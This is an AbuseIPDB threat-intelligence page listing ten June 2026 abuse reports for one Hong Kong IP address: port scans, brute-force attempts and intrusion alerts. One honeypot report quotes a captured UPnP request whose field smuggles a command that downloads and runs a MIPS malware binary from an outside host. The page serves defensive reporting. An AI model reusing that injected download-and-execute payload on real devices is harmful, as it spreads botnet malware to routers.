AbuseIPDB » 103.27.77.130
103.27.77.130
This IP was reported 10 times. Confidence of
Abuse
is 54% : ?
ISP
NetLab Global
Usage Type
Commercial
ASN
AS979
Domain Name
as979.net
Country
ππ°
Hong Kong
City
Hong Kong
IP info including ISP, Usage Type, and Location provided
by IPInfo . Updated weekly.
IP Abuse Reports for 103.27.77.130 :
This IP address has been reported a total of
10
times from
10 distinct
sources.
103.27.77.130 was first reported on
June 16th 2026 , and the most recent report was
1 week ago
Old Reports:
The most recent abuse report for this IP address is from
1 week ago
Reporter
IoA Timestamp (UTC)
Comment
Categories
π©πͺ
Admins@FBN
2026-06-17 09:25:40
(1 week ago)
FW-PortScan: Traffic Blocked srcport=21302 dstport=8080
Port Scan
π«π·
hghosting
2026-06-17 09:12:40
(1 week ago)
CrowdSec auto-report: crowdsecurity/suricata-major-severity β 1 events
Brute-Force
SSH
ππΊ
bcsaba
2026-06-17 09:02:54
(1 week ago)
Suricata: Alert - ET EXPLOIT D-Link DSL-2750B - OS Command Injection
Web App Attack
πΊπΈ
sumnone
2026-06-17 09:00:24
(1 week ago)
Port probing on unauthorized port 23
Port Scan
Hacking
Exploited Host
π©πͺ
centurion
2026-06-17 08:54:06
(1 week ago)
Blocked by UFW on ns02 [52869/tcp] Source port: 48593 TTL: 49 Packet length: 40 TOS: 0x00 This repo ...
show more
Blocked by UFW on ns02 [52869/tcp] Source port: 48593 TTL: 49 Packet length: 40 TOS: 0x00 This report was generated by: https://github.com/sefinek/UFW-AbuseIPDB-Reporter
show less
Port Scan
π³π±
VMHeaven.io
2026-06-17 08:49:41
(1 week ago)
Blocked by UFW [52869/tcp]
Source port: 33295
TTL: 51
Packet length: 40
Port Scan
π¬π§
gbzret4d
2026-06-17 07:03:53
(1 week ago)
Honeypot [uk-production01]: HTTP/1.1 request on 52869
POST /picdesc.xml
User-Agent: Mozilla/4.0 (co ...
show more
Honeypot [uk-production01]: HTTP/1.1 request on 52869
POST /picdesc.xml
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Accept: */*
Accept-Encoding: gzip, deflate
POST Data: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf zuki; wget http://109.104.153.60/bins/frosty.mips -O zuki; chmod 777 zuki; ./zuki realtek.selfrep`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>; 52869 [2] TCP
show less
Hacking
Bad Web Bot
2026-06-17 06:39:29
(1 week ago)
Unauthorized connection attempt
Port Scan
Hacking
Exploited Host
πΊπΈ
MPL
2026-06-16 20:18:52
(1 week ago)
tcp/2323
Port Scan
π¨π
cybsecaoccol
2026-06-16 18:22:12
(1 week ago)
multiple malicious connection attempts on tcp port 23 - sch
DDoS Attack
Port Scan
Hacking
Brute-Force
Showing 1 to
10
of 10 reports
Think this IP has been falsely reported? You may request to have the associated
reports reviewed and removed.
Request Takedown π©
Recently Reported IPs: